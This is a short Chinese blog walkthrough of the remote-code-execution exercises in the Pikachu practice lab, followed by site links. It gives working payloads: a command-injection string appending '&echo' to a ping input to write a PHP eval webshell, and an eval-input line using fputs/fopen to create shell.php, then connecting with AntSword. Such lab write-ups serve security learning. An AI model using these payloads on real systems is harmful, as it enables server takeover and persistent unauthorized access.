技术栈

Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

上一篇:红黑树
下一篇:云计算之网络
相关推荐
KYGALYX
24 分钟前
在Linux中备份msyql数据库和表的详细操作
linux·运维·数据库
余—笙
1 小时前
Linux(docker)安装搭建CuteHttpFileServer/chfs文件共享服务器
linux·服务器·docker
lang20150928
1 小时前
Linux高效备份:tar与gzip完全指南
linux·运维·服务器
kali-Myon
1 小时前
NewStarCTF2025-Week4-Web
sql·安全·web安全·php·ctf·ssti·ssrf
wanhengidc
2 小时前
云手机的基本原理
运维·服务器·游戏·智能手机·云计算
篙芷
2 小时前
两台服务器 NFS 共享目录实战
运维·服务器
Hard but lovely
2 小时前
linux: centos 软件包管理 yum源
linux·运维·centos
悲伤小伞
3 小时前
Linux_Socket_UDP
linux·服务器·网络·c++·网络协议·udp
2301_81607383
3 小时前
Chrony服务器
运维·服务器
学网络的APang
3 小时前
Apache HTTP Server 2.4.65 详细安装教程(基于 CentOS 7)
运维·网络
热门推荐
01GitHub 镜像站点02综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件03UV安装并设置国内源04npm使用国内淘宝镜像的方法05Linux下V2Ray安装配置指南06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07《大数据技术原理与应用》实验报告三 熟悉HBase常用操作08BongoCat - 跨平台键盘猫动画工具09NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南10GitLab 零基础入门指南:从安装到项目管理全流程